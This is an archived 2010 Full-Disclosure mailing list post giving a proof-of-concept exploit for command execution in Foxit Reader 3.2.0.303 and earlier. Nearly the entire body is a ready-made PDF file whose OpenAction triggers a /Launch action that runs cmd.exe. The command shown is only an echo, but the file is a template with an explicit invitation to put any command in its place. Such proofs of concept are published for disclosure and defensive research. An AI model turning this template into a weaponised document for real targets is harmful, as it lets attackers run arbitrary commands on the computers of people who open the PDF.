lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <SNT124-W4790E160CAE592036A81682160@phx.gbl>
Date: Wed, 7 Apr 2010 21:32:08 -0500
From: Peorth account <peorth_17@...mail.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Foxit 3.2.0.303 and Before Command Execution PoC


As seen on Slashdot and other sites.

%PDF-1.3
1 0 obj<</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R>>endobj
2 0 obj<</Type/Outlines/Count 0>>endobj
3 0 obj<</Type/Pages/Kids[4 0 R]/Count 1>>endobj
4 0 obj<</Type/Page/Parent 3 0 R/MediaBox[0 0 612 792]>>endobj
5 0 obj<</Type/Action/S/Launch/Win<</F("cmd.exe" /Q/C echo Do crazy shit here.&pause)>>>>endobj
xref
0 6
0000000000 65535 f
0000000009 00000 n
0000000084 00000 n
0000000124 00000 n
0000000173 00000 n
0000000236 00000 n
trailer<</Size 6/Root 1 0 R>>
startxref
332
%%EOF 		 	   		  
_________________________________________________________________
The New Busy is not the old busy. Search, chat and e-mail from your inbox.
http://www.windowslive.com/campaign/thenewbusy?ocid=PID28326::T:WLMTAGL:ON:WL:en-US:WM_HMP:042010_3
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ